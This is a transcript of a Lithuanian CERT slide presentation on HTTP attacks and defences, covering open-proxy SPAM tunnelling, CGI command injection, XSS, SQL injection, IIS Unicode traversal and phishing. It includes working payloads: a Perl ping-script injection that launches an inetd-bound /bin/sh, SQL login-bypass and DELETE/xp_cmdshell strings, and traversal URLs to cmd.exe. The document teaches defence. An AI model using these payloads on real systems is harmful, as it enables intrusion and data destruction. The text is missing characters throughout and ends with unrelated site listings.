Marius Urkis LITNET CERT.
|
|
- Andrius Gagys
- prieš 4 metus
- Peržiūrų:
Transkriptas
1 Marius Urkis 1
2 HTTP protokolas HTTP plaiausi pritaikym turintis protokolas Request For Comments RFC1945 RFC2616 RFC2817 HTTP protokolas, gyjs plat pritaikymvairiose srityse. Jis naudojamas: Informacijai gauti, ieškoti, talpinti Finansinms operacijoms atlikti Tvarkyti apartin ir programinrang Pokalbiams Žaidimams... Todl, yra labai svarbu suprasti atakas, vykdomas per HTTP prieš taikomasias programas, prieš tinklo infrastuktr, prieš HTTP protokolo vartotojus. 2
3 Prieš HTTP serverio konfigracij Prieš HTTP taikomsias programas Prieš HTTP serverio saugumo spragas Atakas galima suskirstyti kelias kategorijas: Atakuojama HTTP paslauga (serveris), bandant išnaudoti administratoriaus paliktas klaidas serverio konfigracijoje Atakos gali bti nukreiptos prieš WWW taikomsias programas, kuriose klaidas paliko programuotojai HTTP servisins programos taip pat neretai turi saugumo sprag, kuriomis užpuolikai gali bandyti pasinaudoti 3
4 Skenavimai Dažnai pastebimi skenavimai: Tcp/80 Tcp/8080 Tcp/ :34: :34: :34: :34: :35: :38: Dažnai yra pastebimi SYN skenavimai, kuri paskirtis rasti proxy servisus (TCP/8080, TCP/1080, TCP/3128). Skenuotojai taip pat tikrina ir HTTP paslaugas (TCP/80) 4
5 Skenavimo pavyzdys T xxx :2765 -> yyy.100:8080 [S] T xxx :2765 -> zzz.49:8080 [S] T xxx :2765 -> yy.96:8080 [S] T yy.96:8080 -> xxx :2765 [AR] T xxx :2765 -> zzz.49:3128 [S] T xxx :2765 -> [S] T xxx :2765 -> yy.149:8080 [S] T xxx :2765 -> yyy.100:3128 [S] T xxx :2765 -> hhh.167:1080 [S] T xxx :2765 -> ww.179:3128 [S] T xxx :2765 -> yy.149:3128 [S] T xxx :2765 -> zz.73:3128 [S] T xxx :2765 -> qqq.33:1080 [S] 5
6 Skenavim turinys T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T XXX : > yyy.101:8080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph T XXX : > zz.12:8080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph T XXX : > qq.30:1080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph Peržirjus toki skenavim aplication lygio turin galima aptikti vien bendr bruož: visi HTTP skenavimai ieško serviso, priimanio CONNECT užklausas. Pagal RFC2616 (HTTP 1.1), CONNECT metodas reikalingas proxy servisams tuneliavimo funkcijai atlikti. Pagal RFC2817 (Upgrading to TLS Within HTTP/1.1), CONNECT metodas yra reikalingas tam, kad bt galima prašyti tunelio per proxy server. CONNECT metodui nurodomas URI, kur turi eiti kompiuterio adresas ir porto numeris, kur norima jungtis. Po CONNECT eiluts gali eiti 0 arba daugiau HTTP antraši eilui. Po dviej tuši eilui proxy serveriui galima sisti tuneliuojamus duomenis. Tame paiame RFC nurodoma, jog reikalinga riboti kokius portus leidžiama atlikti tuneliavim. Tuneliavimas TCP/25 (SMTP) port nurodomas kaip potencialiai pavojingas, kadangi jo pagalba galima masin SPAM platinim. 6
7 Apsaugotos sistemos atsakas T 2004/11/16 07:28: zzz.106:80 -> XX :2463 [AP] HTTP/ Method Not Allowed..Date: Tue, 16 Nov :28:35 GMT..Server: Apache/ (Debian GNU/Linux) mod_jk/1.2.1 PHP/ Allow: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACE..Connection: close..content-type: text/html; charset=iso <!doctype HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<TITLE>405 Method Not Allowed</TITLE>.</HEAD><BODY>.<H1>Method Not Allowed</H1>.The requested method CONNECT is not allowed for the URL /index.html.<p>.<hr>.<address>apache/ Server at ns.domenas.lt Port 80</ADDRESS>.</BODY></HTML>. Tinkamai sutvarkyta ir apsaugota sistema tokius kreipinius atsako klaidos kodu (pvz 405 Method Not Allowed) 7
8 Pažeidžiamos sistemos atsakas T WW :4650 -> xx.193:3128 [AP] CONNECT :25 HTTP/ T xx.193:3128 -> WW :4650 [AP] HTTP/ Connection established..proxy Sistema, leidžianti tokio tipo tuneliavim, užklaus atsako kodu 2XX 8
9 SPAM platinimas T WW :4650 -> xx.193:3128 [AP] CONNECT zz :25 HTTP/ T xx.193:3128 -> WW :4650 [AP] HTTP/ Connection established..proxy T xx.193:3128 -> WW :4650 [AP] 220 YSmtp aaa.bbb.yahoo.com ESMTP T xx.193:3128 -> WW :4650 [AP] 250 aaa.bbb.yahoo.com.. T xx.193:3128 -> WW :4650 [AP] 250 sender <xxxxxxx@yahoo.com> ok.. T WW :4650 -> xx.193:3128 [AP] RCPT TO: <yyyyyyy@geocities.com>.. T WW :4650 -> xx.193:3128 [AP] RCPT TO: <zzzzzzzz@geocities.com>.. T xx.193:3128 -> WW :4650 [AP] 250 recipient <yyyyyyyy@geocities.com> ok.. Skenuotojai aptik tok neapsaugot proxy servis pradeda masin SPAM laišk platinim. 9
10 Piktybiniai proxy YYY.71 TCP/14977 HTTP proxy SMTP TCP/25 XX ZZ Neretai, po silaužimo kompiuter, ar kompiuterio užkrtimo, jame paliekamas pašalinis piktybinis proxy servisas, leidžiantis atlikti masin laišk platinim. Pavyzdyje: silaužta kompiuter YYY.71. Jame paliktas HTTP proxy servisas (TCP/14977) Kompiuteris XX jungiasi YYY.71 ir prašo tuneliuoti srautus ZZ :25 Kompiuteris YYY.71 atlieka prisijungim prie ZZ :
11 Piktybinio proxy pavyzdys T XX : > YYY.71:14977 [AP] CONNECT ZZ :25 HTTP/ T YYY.71: > XX :34734 [AP] HTTP/ Connection established... T XX : > YYY.71:14977 [AP] HELO ynfkgic.. T YYY.71:2787 -> ZZ :25 [AP] HELO ynfkgic.. T ZZ :25 -> YYY.71:2787 [AP] 250 AAA.BBB.CCC.com OK.. T YYY.71: > XX :34734 [AP] 250 AAA.BBB.CCC.com OK
12 Serviso patikrinimas [1] > telnet XX Trying XX Connected to XX.33. Escape character is '^]'. CONNECT smtp.domain.lt:25 http/1.0 HTTP/ Connection established Proxy-agent: WinRoute Pro/ smtp.domain.lt ESMTP daemon lives here Patikrinti, ar serveris neleidžia tuneliavimo 25 port, galima taip: Reikia su klientine telnet programa prisijungti prie serverio HTTP (proxy) porto vesti komand CONNECT smtp_serveris.lt:25 HTTP/1.0 ir dukart paspausti Enter Jei serveris sutvarkytas neteisingai ir leidžia TCP/25 tuneliavim, gaunamas patvirtinimas (HTTP gržinimo kodas 200) bei SMTP serverio pasisveikinimas. 12
13 Serviso patikrinimas [2] > telnet 80 Trying XXX Connected to Escape character is '^]'. CONNECT smtp.domain.lt:25 http/1.0 HTTP/ Method Not Allowed Date: Wed, 01 Dec :34:39 GMT Server: Apache Allow: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACE Connection: close Content-Type: text/html; charset=iso <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>405 Method Not Allowed</TITLE> </HEAD><BODY> <H1>Method Not Allowed</H1> The requested method CONNECT is not allowed for the URL /index.html.<p> </BODY></HTML> Connection closed by foreign host. Teisingai sutvarkyti serveriai turi gržinti klaidos kod 4XX, pvz: HTTP/ Method Not Allowed 13
14 CGI pažeidžiamumai. Vartotojo vedama informacija /bin/sh Perl system() open() Php Fail vardai ( ) Globals kintamieji Kita atak grup atakos prieš taikomsias programas. Viena išprast programuotoj klaid nepakankama vartotojo vedamos informacijos kontrol. Viena iš pavojingiausi toki sprag leidžia parametrais perduoti serveryje vykdomai programai užslptas komandas, kurios taip pat vykdomos serveryje. Pavyzdžiui: Tokios komandos gali bti perduodamos UNIX shell skriptams, panaudojant specialius simbolius, kuriuos UNIX shell interpretuoja ir paleidžia subshell aplinkas. Perl funkcijoms system(), open() ir panašioms tarp argument padavus specialius shell simbolius, jie taip pat gali bti interpretuoti UNIX shell aplinkoje 14
15 CGI pažeidžiamumai. Pvz [1] #!/usr/bin/perl # use CGI; $query=new CGI; $ip=$query->param('ip'); print $query->header, $query->start_html, $ip,":<p>"; open (OUT, "/bin/ping -c 4 $ip "); while (<OUT>) { print $_,"<br>"; } Pažeidžiamo perl skripto pavyzdys. Šio skripto paskirtis atlikti ryšio testavim, vykdant ping komand su vartotojo perduotu IP adresu. Programa naršyklei perduoda tai, k išveda ping. 15
16 CGI pažeidžiamumai. Pvz [2] : PING ( ) from xxxx : 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=64 time=0.172 ms 64 bytes from : icmp_seq=2 ttl=64 time=0.159 ms 64 bytes from : icmp_seq=3 ttl=64 time=0.287 ms 64 bytes from : icmp_seq=4 ttl=64 time=0.175 ms ping statistics packets transmitted, 4 received, 0% loss, time 3016ms rtt min/avg/max/mdev = 0.159/0.198/0.287/0.052 ms Tokio skripto iškvietimas ir išvedama informacija. 16
17 CGI pažeidžiamumai. Pvz [3] XXX.ktu.lt/cgibin/test/test.pl?ip=0 ls%20-l%20/ 0 ls -l /: total 1541 drwxr-xr-x 2 root root 2048 Nov 8 17:53 bin drwxr-xr-x 2 root root 1024 Nov 19 12:08 boot drwxr-xr-x 2 root root 1024 Sep cdrom drwxr-xr-x 9 root root Nov 22 00:03 dev drwxr-xr-x 56 root root 3072 Nov 19 12:10 etc drwxr-xr-x 3 root root 1024 Apr export drwxr-xr-x 2 root root 1024 Sep floppy drwxr-xr-x 15 root root 4096 Oct 15 15:22 home drwxr-xr-x 5 root root 4096 Nov lib drwx root root Sep lost+found Bet, kadangi skripte nra parametr tikrinimo, galima parametrus suformuoti taip, kad serveryje btvykdyta tam tikra vartotojo norima komanda. Pavyzdyje panaudojamas pipe simbolis, ir nurodoma vykdyti komand ls l /. Rezultatas išvedamas serverio šakninio katalogo turinys. 17
18 CGI pažeidžiamumai. Pvz [4] XXX.ktu.lt/cgibin/test/test.pl?ip=0 ls%20-l%20/ open (OUT, "/bin/ping -c 4 0 ls l / "); while (<OUT>) { print $_,"<br>"; } Iš tikro, argumentus staius paduodam parametr reikšmes, serveryje yra vykdoma tokia komamda: "/bin/ping -c 4 0 ls l / Komanda vykdoma tokiomis teismis, kokiomis yra paleistas HTTP servisas. 18
19 CGI pažeidžiamumai. Pvz [5] XXX.ktu.lt/cgibin/test/test.pl?ip=0 echo stream tcp nowait web /bin/sh > /tmp/hck XXX.ktu.lt/cgibin/test/test.pl?ip=0 inetd /tmp/hck Kitas šio skripto spagos išnaudojimo pavyzdys: Pirmasis kreipinys sukuria fail /tmp/hck, kurio turinys: stream tcp nowait web /bin/sh Antras kreipinys paleidžia inetd servis su konfigracija /tmp/hck Šie du žingsniai faktiškai sukuria servis ant porto TCP/11111, prie kurio prisijungus paleidžiamas UNIX shell. 19
20 CGI pažeidžiamumai. Pvz [6] ls -l /tmp/hck -rw-r--r-- 1 web web 36 Nov 22 14:45 /tmp/hck root@xxx:/tmp# ps aux grep inetd root ? S Nov19 0:00 /usr/sbin/inetd web ? S 14:49 0:00 inetd /tmp/hck root@xxx:/tmp# lsof -p 5237 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME inetd 5237 web cwd DIR 33, / inetd 5237 web rtd DIR 33, / inetd 5237 web txt REG 33, /usr/sbin/inetd inetd 5237 web mem REG 33, /lib/ld so inetd 5237 web mem REG 33, /lib/libc so inetd 5237 web 0u CHR 1, /dev/null inetd 5237 web 1u CHR 1, /dev/null inetd 5237 web 2u CHR 1, /dev/null inetd 5237 web 4u IPv TCP *:11111 (LISTEN) Atlikus šiuos du kreipinius, serveryje atsiranda failas /tmp/hck bei servisas, aptarnaujantis TCP/11111 port. 20
21 Perl: Cgi apsaugojimo priemons perl T use strict; PHP: if (ereg("^[a-z]+\.html$", $id)) { echo "Good!"; Apsisaugoti nuo toki sprag galima tik griežtai tikrinant vartotojvedamus parametrus, HTTP antraštes, cookie reikšmes. Perl kalboje, laikytis griežt programavimo taisykli priveria perl paleidimo raktas T (taint režimas) ir modulis strict. Taint režimas neleidžia nepakankamai patikrintoms parametr reikšmms patekti tam tikr funkcij argumentus. Strict režimas kontroliuoja globali kintamj panaudojim. Rekomenduojama strategija, filtruojant reikšmes iš parametro paimti tik simbolius iš aibs, kuri yra numats programuotojas. Nra rekomenduojama reikšmje ieškoti neleistin simboli ir juos naikinti ar nepraleisti, kadangi toki užbaigt aib numatyti yra sudtingiau. 21
22 Cgi apsaugojimo priemons. Pavyzdys #!/usr/bin/perl -T # $ENV{'PATH'} ='/bin'; use CGI; $query=new CGI; $ip=$query->param('ip'); print $query->header, $query->start_html; print $ip,":<p>"; if ($ip=~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { $ip = $1; } else { print "Bad data<p>"; exit; } open (OUT, "/bin/ping -c 4 $ip "); while (<OUT>) { print $_,"<br>"; } Reikšmi filtravimo pavyzdys programuojant su perl Taint režimu. Iš IP parametro reikšms paimami tik tokie simboliai, kurie yra numatyti programuotojo (skaitmenins reikšms ir taškai). 22
23 Cross Site Scripting, CSS/XSS <script>kodas... </script> HTTP <script>kodas... </script> HTTP WWW Chat Skelbim lentos Svei knyga... Kitas dažnai pasitaikantis pažeidžiamumas Cross Site Scripting. Jo esm WWW serverio pagalba terpti www puslapius instrukcijas (javascript, Vbscript), kurias vliau vykdys kito vartotojo naršykl. Paprastai toki atak aukos bna www skelbim lent skaitytojai, pokalbi dalyviai, WWW el. pašto vartotojai. Pavyzdžiui, skelbimo lentoje užpuolikas palieka javascript kod. Kodas yra išsaugojamas WWW serveryje, ir kiekvienas vartotojas, peržirindamas ši skelbim lent, atsisis š javascript kod ir vartotojo naršykl j vykdys. 23
24 CSS pavyzdys Išbandyti CSS veikim galima tinklapyje
25 CSS pavyzdys 25
26 CSS priešnuodžiai. Vartotojui Skript išjungimas Nespausti nuorod el. laiškuose Atsijungti iš tinklapio (logout) prieš jungiantis kitur Vartotojas saugotis nuo CSS atak gali: Naršyklje išjungdamas scripting funkcijas (nepopuliarus sprendimas, apkarpantis naršykls funkcionalum) Vengti sekti nuorodomis, gaunamomis el. paštu ar IRC kanalais) Atsijungti iš tinklapio prieš palikdamas j 26
27 CSS priešnuodžiai. Serveris Programinranga atnaujinama nuolat Vieno prisijungimo (single sign-on) eliminavimas Dinaminio turino filtravimas, paliekant tik leistinus simbolius vedamos informacijos filtravimas, pašalinant neleistinus simbolius: < > % ; ) ( & + - Pagrindins priemons turi bti realizuotos serveryje. Taikomosios programos turi filtruoti simbolius, kuri pagalba galima suformuoti html kod. 27
28 SQL injection SQL instrukcijterpimas WWW tinklapio parametrus taip, kad tos instrukcijos bt vykdytos SQL serveryje Dar viena pavojinga ataka SQL terpimas. Jos esm tarp parametrterpti SQL išraiškas taip, kad jas vykdyt SQL serveris. 28
29 SQL injection. Pavyzdys <b>login Now</b> <form name="login" action="/support/dologin.asp" method="post"> Member Name: <input name="login_member" value=""> Password: <input name= login_password" value="" type="password"> <input name="login_save" value="1" checked="checked" type="checkbox"> Save name and password <input value="log Me In!" type="submit"> </form> Internete dažnai galima sutikti toki HTML form, kurios leidžia vesti prisijungimo vard ir slaptažod. 29
30 SQL injection p_strusername = Request.Form("login_member ") p_strpassword = Request.Form( login_password") strsql = "SELECT * FROM tblusers " & _ "WHERE Username='" & p_strusername & _ "' and Password='" & p_strpassword & "'" SELECT * FROM tblusers WHERE Username= marius' and Password= slaptazodis123 If (aaa.eof) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & aaa("username") End If Dažnai vartotojai bna saugomi SQL duomen bazse. vesto vardo ir slaptažodžio teisingumo vertinimui yra vykdomas SQL SELECT kreipinys. vedus Login <- marius ir Password <- slaptazodis123 btvykdytas toks SELECT kreipinys: SELECT * FROM tblusers WHERE Username= marius'and Password= slaptazodis
31 SQL injection login_member or a = a login_password or 1=1 -- strsql = "SELECT * FROM tblusers " & _ "WHERE Username='" & p_strusername & _ "' and Password='" & p_strpassword & "'" SELECT * FROM tblusers WHERE Username= or a = a and Password= or 1=1 -- Tok skripto veikim galima pakeisti vedus specialiai parinktas parametr reikšmes. Pavyzdžiui, panaudojus viengubas kabutes ir vedus or instrukcijas gali bti suformuotas toks SELECT sakinys: SELECT * FROM tblusers WHERE Username= or a = a and Password= or 1=1 - - Šio sakinio slyga WHERE yra teisinga visada ir tokio SELECT sakinio rezultatas yra visa vartotoj lentel. Gale vedamas komentaro ženklas eliminuoja pasiliekani kabut Tokiu bdu prie sistemos prisijungiama pirmojo vartotojo, rasto lentelje, teismis 31
32 SQL injection. Variantai ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a Kiti galimi or instrukcijos vedimo variantai 32
33 SQL injection. Pavyzdžiai ; UPDATE tblusers' SET Password' = 'newpas5' WHERE username='neo' - ; INSERT INTO 'tblusers' ('login_id', username', 'password', 'details') VALUES (666,'neo2','newpas5','NA') - ; DELETE FROM tblusers -- ; exec master..xp_cmdshell 'ping '-- Pasinaudojant SQL terpimo spagomis, galima atlikti ir kitokius veiksmus: Pakeisti esam lentels lauk reikšmes terpti naujus rašus Sunaikinti lentel Vykdyti komandas Ir kita 33
34 SQL injection. Apsauga Filtruoti cookie, formos parametr reikšmes: - ", / \ * & ( ) $ % ~? ; NULL \n \r Tikrinti vedamas reikšmes (ISNUMERIC) Riboti vedamos eiluts ilg Formoms leisti tik POST metod SQL server paleisti su neadministratoriaus privilegijomis Iš SQL serverio pašalinti stored procedures : Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask Apsisaugojant nuo SQL terpimo, svarbiausia tinkamai filtruoti formos parametrus ir kit informacij, kuri gauna skriptas. Kitos galimos priemons tikrinti parametr logik, riboti parametr eiluts ilg, minimizuoti SQL serviso vartotojo privilegijas, pašalinti stored procedures 34
35 Unicode atakos. MS MS IIS tikrina užklausas ir atmeta../ tem32/cmd.exe Po to atliekamas Unicode dekodavimas / atitinka %c0%af innt/system32/cmd.exe Kitas atak tipas atakos, išnaudojanios paio serviso spragas. ia pateiktas pavyzdys MS IIS spragos, kai Unicode kodavimo dka galima apeiti parametr patikrinimus. MS IIS tikrina URL eilut, ar joje nra simboli../. Tokie simboliai leist keliauti po katalog med serveryje ir vykdyti bet kokias programas. Kadangi Unicode dekodavimas atliekamas po šio tikrinimo, Unicode simboliais užkodavus tikrinamus simbolius atak vis tiek pavyksta realizuoti 35
36 CodeRed atakos [01/Oct/2003:11:06: ] "GET /scripts/root.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /MSADC/root.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" Tokia ataka palieka savo pdsakus serverio žurnale. 36
37 Phishing Phishing = password fishing = slaptažodži žvejyba Apgaul, siekant išgauti asmenin informacij: Banko korteli informacij Slaptažodžiai Sskait informacija kita Phishing tai nra tipas, o greiiau metodas pulti, panaudojant taip pat ir HTTP atakas (CSS). ia phishing atakos minimos dar ir todl, kad pastaruoju metu pasaulyje j intensyvumas itin išaugo phishing atvej per pus met padaugjo apie 4000%. Vien JAV vartotojai per šiuos metus neteko apie 2 mlrd. USD. Phishing atakos tikslas išgauti asmenin svarbi informacij, toki kaip bank korteli informacija. 37
38 Nuostoliai dl asmenins informacijos grobimo Aukos el. bankininkysts vartotojai (CityBank, SunTrust, ebay, PayPal) Nuostoliai: 2004metais nukentjo 1,8 mln. amerikiei Vidutiniškai nukentj s neteko 1200USD Prarasta apie 2 mlrd. USD Pagrindiniai phishing atak taikiniai elektronins bankininkysts klientai. 38
39 Phishing. Pavyzdys Tipin phishing ataka: Banko klientams išsiuniamas falsifikuotas laiškas, pasirašytas, neva, banko personalo, ir kvieiantis (gal bt dl koki nors problem) apsilankyti banko svetainje bei patvirtinti tam tikr informacij. 39
40 Spragteljus nurodyt nuorod, naršykl nukreipiamregistracijos puslap, kuriame vartotojas prašomas palikti svarbi informacij. Vaizduojama informacija bna pateikiama taip, kad vartotojas bttikinamas svetains autentiškumu. Kaip taisykl, registracijos prisijungimas nebna apsaugotas SSL šifravimu (nra užrakintos spynos piktograma statuso eilutje). 40
41 Kitas falsifikuotos svetains pavyzdys. Kairje originali svetain 41
42 Phishing technologijos This is a multi-part message in MIME format Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <html><p><font face="arial"> <A HREF=" <map name="fpmap0"> <area coords="0, 0, 610, 275" shape="rect" href=" %35:%33%31%32%37/%63%69%74/%69%6E%64%65%78%2E%68%74%6D"> </map><img SRC="cid:part @usersupport07@citibank.com" border="0" usemap="#fpmap0"></a></a></font></p><p> <font color="#fffff6">in 1870 Supercuts pays I am on a Yes, I don't mind I wish </font></p></html> Dažnai, norint suklaidinti vartotoj imamasi toki technologij: terpiamas image map paveiksllis, kurio nuoroda nukreipiama original banko tinklap (tai yra adresas, kur rodo el. pašto skaitymo programa). Tuo tarpu image map mechanizmas paspaudus nukreipia pašalin tinklap. Piktybinio tinklapio, surenkanio korteli informacij, adresas neretai užkoduojamas šešioliktainmis simboli reikšmmis. Tai turi nešti papildomos painiavos vartotojui. 42
43 Dekodavimas <area coords="0, 0, 610, 275" shape="rect" href=" %2E%31%33%35:%33%31%32%37/%63%69%74/%69% 6E%64%65%78%2E%68%74%6D"> </map> > echo 63%69%74/%69%6E%64%65%78%2E%68%74%6D perl -e 'while (<>) { s/%(..)/pack("c", hex($1))/eg; print;} Tok užkoduot adres galima dekoduoti panaudojant perl skript. 43
DB sukūrimas ir užpildymas duomenimis
DB sukūrimas ir užpildymas duomenimis Duomenų bazės kūrimas Naujas bendrąsias DB kuria sistemos administratorius. Lokalias DB gali kurti darbo stoties vartotojasadministratorius. DB kuriama: kompiuterio
DetaliauLongse Wi-Fi kameros greito paleidimo instrukcija 1. Jums prireiks 1.1. Longse Wi-Fi kameros 1.2. Vaizdo stebėjimo kameros maitinimo šaltinio 1.3. UTP
Longse Wi-Fi kameros greito paleidimo instrukcija 1. Jums prireiks 1.1. Longse Wi-Fi kameros 1.2. Vaizdo stebėjimo kameros maitinimo šaltinio 1.3. UTP RJ-45 interneto kabelio 1.4. Kompiuterio su prieiga
DetaliauMAGENTO 1.9 OMNIVA MODULIO DIEGIMO INSTRUKCIJA
MAGENTO 1.9 OMNIVA MODULIO DIEGIMO INSTRUKCIJA Turinys MODULIO FUNKCIONALUMAS... 3 NAUDOJAMI TERMINAI IR SĄVOKOS... 3 REKOMENDUOJAMI NAUDOTI ĮRANKIAI... 3 ELEKTRONINĖS PARDUOTUVĖS REIKALAVIMAI... 3 SERVERIO
DetaliauPATVIRTINTA Valstybinės kainų ir energetikos kontrolės komisijos pirmininko 2017 m. d. įsakymu Nr. O1- VALSTYBINĖS KAINŲ IR ENERGETIKOS KONTROLĖS KOMI
PATVIRTINTA Valstybinės kainų ir energetikos kontrolės komisijos pirmininko 2017 m. d. įsakymu Nr. O1- VALSTYBINĖS KAINŲ IR ENERGETIKOS KONTROLĖS KOMISIJOS ELEKTROS ENERGIJOS KAINŲ PALYGINIMO INFORMACINĖS
DetaliauPardavimų aplikacija (Microsoft Dynamics AX (Axapta) sistemai) Diegimo instrukcija bifree.lt qlik.com
Pardavimų aplikacija (Microsoft Dynamics AX (Axapta) sistemai) Diegimo instrukcija bifree.lt qlik.com Microsoft Dynamics AX (Axapta) sistemai 2 Kaip įsidiegti Diegimo žingsniai: 1. Atsisiųsti ir įsidiegti
DetaliauLietuvos mokslo ir studijų institucijų kompiuterių tinklas LITNET Vilniaus universitetas Mokslininko darbo vietos paslauga Paslaugos naudojimo instruk
Lietuvos mokslo ir studijų institucijų kompiuterių tinklas LITNET Vilniaus universitetas Mokslininko darbo vietos paslauga Paslaugos naudojimo instrukcija Paslauga sukurta vykdant Europos socialinio fondo
DetaliauNACIONALINIS KIBERNETINIO SAUGUMO CENTRAS Tel El. p. NACIONALINIS KIBERNETINIO SAUGUMO CENTRAS PRIE KRAŠTO APSA
PRIE KRAŠTO APSAUGOS MINISTERIJOS SUTRUMPINTAS PRANEŠIMAS APIE KIBERNETINIO INCIDENTO TYRIMĄ NR. 163811 2019 m. balandžio 19 d. Vilnius TLP: WHITE Kibernetinio incidento tyrimo objektas: 2019-04-10 imituotų
DetaliauSpecialiosios_SoyouStart_dedikuoto_serverio_nuomos_sutarties_salygos
SPECIALIOSIOS So You Start DEDIKUOTO SERVERIO NUOMOS SUTARTIES SĄLYGOS Versija: 2013-12-05 1 STRAIPSNIS: TIKSLAS Šių specialiųjų sąlygų, papildančių pagrindines So You Start paslaugų teikimo sutarties
DetaliauK9 WebProtection (toliau K9) programa yra nemokama asmeniniam naudojimui. Programa suderinama su Windows Vista, Windows 7, Windows 10 ir Mac operacinė
K9 WebProtection (toliau K9) programa yra nemokama asmeniniam naudojimui. Programa suderinama su Windows Vista, Windows 7, Windows 10 ir Mac operacinėmis sistemomis. Programa K9 yra lengvai perprantama
DetaliauNACIONALINIS KIBERNETINIO SAUGUMO CENTRAS Tel El. p. NACIONALINIS KIBERNETINIO SAUGUMO CENTRAS PRIE KRA
PRIE KRAŠTO APSAUGOS MINISTERIJOS RESPUBLIKOS PREZIDENTO IR EUROPOS PARLAMENTO RINKIMŲ KIBERNETINĖS ERDVĖS STEBĖSENOS ATASKAITA 2019 m. gegužės 28 d. Vilnius Santrauka: Respublikos Prezidento ir Europos
DetaliauAdministravimo vadovas SAFTit Pro v3
SAF-T IT Pro programos administravimo vadovas Turinys 1. SQL užklausų modifikacija... 2 1.1. Užklausų katalogas ir kaip sukurti nestandartines užklausas... 2 1.2. Užklausų modifikavimas... 2 1.3. Specialieji
DetaliauMUITINĖS DEPARTAMENTAS PRIE LIETUVOS RESPUBLIKOS FINANSŲ MINISTERIJOS BENDRO NAUDOTOJŲ VALDYMO SISTEMOS, ATITINKANČIOS EUROPOS KOMISIJOS REIKALAVIMUS,
MUITINĖS DEPARTAMENTAS PRIE LIETUVOS RESPUBLIKOS FINANSŲ MINISTERIJOS BENDRO NAUDOTOJŲ VALDYMO SISTEMOS, ATITINKANČIOS EUROPOS KOMISIJOS REIKALAVIMUS, SUKŪRIMO VERSIJA: v0.10 Vilnius 2018 TURINYS 1 Windows
DetaliauRR-GSM_IM_LT_110125
Retransliatorius RR-GSM Įrengimo instrukcija Draugystės g. 17, LT-51229 Kaunas El. p.: info@trikdis.lt www.trikdis.lt Retransliatorius RR-GSM perduoda priimtus pranešimus į centralizuoto stebėjimo pultą
DetaliauPRESTASHOP 1.7 OMNIVA MODULIO DIEGIMO INSTRUKCIJA
PRESTASHOP 1.7 OMNIVA MODULIO DIEGIMO INSTRUKCIJA Turinys MODULIO FUNKCIONALUMAS... 3 ELEKTRONINĖS PARDUOTUVĖS REIKALAVIMAI... 3 SERVERIO REIKALAVIMAI... 3 DIEGIMO PROCEDŪRA... 3 Omniva LT modulio diegimas...
DetaliauMicrosoft Word - AUTOSERVISO MODULIS
AUTOSERVISO MODULIS APRAŠYMAS 1. Darbo pradžia. Autoserviso modul aktyvuokite per programos meniu Parametrai > Darbo vietos nustatymai. Skyrelyje Kiti pažymkite Autoservisas ir paspauskite mygtuk Gerai.
DetaliauP. Kasparaitis. Praktinė informatika. Skriptų vykdymas ir duomenų valdymas Skriptų vykdymas ir duomenų valdymas Įvadas Skripto failas tai M
Skriptų vykdymas ir duomenų valdymas Įvadas Skripto failas tai MATLAB komandų seka, vadinama programa, įrašyta į failą. Vykdant skripto failą įvykdomos jame esančios komandos. Bus kalbama, kaip sukurti
